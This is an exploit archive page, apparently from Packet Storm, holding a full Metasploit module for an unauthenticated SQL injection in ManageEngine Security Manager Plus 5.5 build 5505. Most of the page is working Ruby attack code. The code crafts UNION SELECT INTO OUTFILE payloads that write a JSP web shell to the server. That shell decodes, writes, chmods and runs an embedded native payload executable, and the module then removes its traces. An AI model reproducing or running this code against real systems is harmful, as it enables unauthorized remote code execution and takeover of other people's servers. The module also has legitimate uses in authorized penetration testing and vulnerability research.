what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection

ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection
Posted Oct 28, 2012
Authored by egypt, sinn3r, xistence | Site metasploit.com

This Metasploit module exploits a SQL injection found in ManageEngine Security Manager Plus advanced search page, which results in remote code execution under the context of SYSTEM in Windows; or as the user in Linux. Authentication is not required in order to exploit this vulnerability.

tags | exploit, remote, code execution, sql injection
systems | linux, windows
SHA-256 | ae2e0907bda1eeb2906f4560caa8085b35712d1a7fe05eeb19dddd8fe8de7ac1

ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE

def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
'Description' => %q{
This module exploits a SQL injection found in ManageEngine Security Manager Plus
advanced search page, which results in remote code execution under the context of
SYSTEM in Windows; or as the user in Linux. Authentication is not required in order
to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'xistence <xistence[at]0x90.nl>', # Discovery & Metasploit module
'sinn3r', # Improved Metasploit module
'egypt' # Improved Metasploit module
],
'References' =>
[
['EDB','22094'],
['BID', '56138']
],
'Platform' => ['win', 'linux'],
'Targets' =>
[
['Automatic', {}],
['Windows', { 'Arch' => ARCH_X86, 'Platform' => 'win' }],
['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => "Oct 18 2012"))

register_options(
[
OptPort.new('RPORT', [true, 'The target port', 6262])
], self.class)
end


def check
res = sqli_exec(Rex::Text.rand_text_alpha(1))

if res and res.body =~ /Error during search/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end


def pick_target
return target if target.name != 'Automatic'

rnd_num = Rex::Text.rand_text_numeric(1)
rnd_fname = Rex::Text.rand_text_alpha(5) + ".txt"
outpath = "../../webapps/SecurityManager/#{rnd_fname}"

@clean_ups << outpath

sqli = "#{rnd_num})) union select @@version,"
sqli << (2..28).map {|e| e} * ","
sqli << " into outfile \"#{outpath}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"
sqli_exec(sqli)

res = send_request_raw({'uri'=>"/#{rnd_fname}"})

# What @@version returns:
# Linux = 5.0.36-enterprise
# Windows = 5.0.36-enterprise-nt

if res and res.body =~ /\d\.\d\.\d\d\-enterprise\-nt/
print_status("#{rhost}:#{rport} - Target selected: #{targets[1].name}")
return targets[1] # Windows target
elsif res and res.body =~ /\d\.\d\.\d\d\-enterprise/
print_status("#{rhost}:#{rport} - Target selected: #{targets[2].name}")
return targets[2]
end

return nil
end


#
# We're in SecurityManager/bin at this point
#
def on_new_session(cli)
if target['Platform'] == 'linux'
print_warning("Malicious executable is removed during payload execution")
end

if cli.type == 'meterpreter'
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
end

@clean_ups.each { |f|
base = File.basename(f)
f = "../webapps/SecurityManager/#{base}"
print_warning("#{rhost}:#{rport} - Deleting: \"#{base}\"")

begin
if cli.type == 'meterpreter'
cli.fs.file.rm(f)
else
del_cmd = (@my_target['Platform'] == 'linux') ? 'rm' : 'del'
f = f.gsub(/\//, '\\') if @my_target['Platform'] == 'win'
cli.shell_command_token("#{del_cmd} \"#{f}\"")
end

print_good("#{rhost}:#{rport} - \"#{base}\" deleted")
rescue ::Exception => e
print_error("Unable to delete: #{e.message}")
end
}
end


#
# Embeds our executable in JSP
#
def generate_jsp_payload
opts = {:arch => @my_target.arch, :platform => @my_target.platform}
native_payload = Rex::Text.encode_base64(generate_payload_exe(opts))
native_payload_name = Rex::Text.rand_text_alpha(rand(6)+3)
ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'

var_raw = Rex::Text.rand_text_alpha(rand(8) + 3)
var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3)
var_buf = Rex::Text.rand_text_alpha(rand(8) + 3)
var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3)
var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3)

if @my_target['Platform'] == 'linux'
var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
chmod = %Q|
Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
Thread.sleep(200);
|

var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
cleanup = %Q|
Thread.sleep(200);
Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
|
else
chmod = ''
cleanup = ''
end

jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>

<%
byte[] #{var_raw} = null;
BufferedOutputStream #{var_ostream} = null;
try {
String #{var_buf} = "#{native_payload}";

BASE64Decoder #{var_decoder} = new BASE64Decoder();
#{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());

File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
String #{var_path} = #{var_tmp}.getAbsolutePath();

#{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
#{chmod}
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
#{cleanup}
} catch (Exception e) {
}
%>
|

jsp = jsp.gsub(/\n/, '')
jsp = jsp.gsub(/\t/, '')

jsp.unpack("H*")[0]
end

def sqli_exec(sqli_string)
cookie = 'STATE_COOKIE=&'
cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&'
cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&'
cookie << 'Home/ID/166/PDCA/MainDAC/_PV/174&'
cookie << 'HomePageSub/ID/226/PDCA/SecurityManager_CONTENTAREA/_PV/166&'
cookie << 'HomePageSubTab/ID/225/_PV/226/selectedView/HomePageSecurity&'
cookie << 'HomePageSecurity/ID/223/PDCA/HomePageSubDAC/_PV/226&'
cookie << '_REQS/_RVID/SecurityManager/_TIME/31337; '
cookie << '2RequestsshowThreadedReq=showThreadedReqshow; '
cookie << '2RequestshideThreadedReq=hideThreadedReqhide;'

state_id = Rex::Text.rand_text_numeric(5)

send_request_cgi({
'method' => 'POST',
'uri' => "/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp",
'headers' => {
'Cookie' => cookie,
'Accept-Encoding' => 'identity'
},
'vars_get' => {
'reqType' =>'AdvanceSearch',
'SUBREQUEST' =>'XMLHTTP'
},
'vars_post' => {
'ANDOR' => 'and',
'condition_1' => 'OpenPorts@PORT',
'operator_1' => 'IN',
'value_1' => sqli_string,
'COUNT' => '1'
}
})
end

#
# Run the actual exploit
#
def inject_exec(out)
hex_jsp = generate_jsp_payload
rnd_num = Rex::Text.rand_text_numeric(1)
sqli = "#{rnd_num})) union select 0x#{hex_jsp},"
sqli << (2..28).map {|e| e} * ","
sqli << " into outfile \"#{out}\" FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}"

print_status("#{rhost}:#{rport} - Trying SQL injection...")
sqli_exec(sqli)

fname = "/#{File.basename(out)}"
print_status("#{rhost}:#{rport} - Requesting #{fname}")
send_request_raw({'uri' => fname})

handler
end


def exploit
# This is used to collect files we want to delete later
@clean_ups = []

@my_target = pick_target
if @my_target.nil?
print_error("#{rhost}:#{rport} - Unable to select a target, we must bail.")
return
end

jsp_name = rand_text_alpha(rand(6)+3)
outpath = "../../webapps/SecurityManager/#{jsp_name + '.jsp'}"

@clean_ups << outpath

inject_exec(outpath)
end
end
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    6 Files
  • 18
    Aug 18th
    4 Files
  • 19
    Aug 19th
    12 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close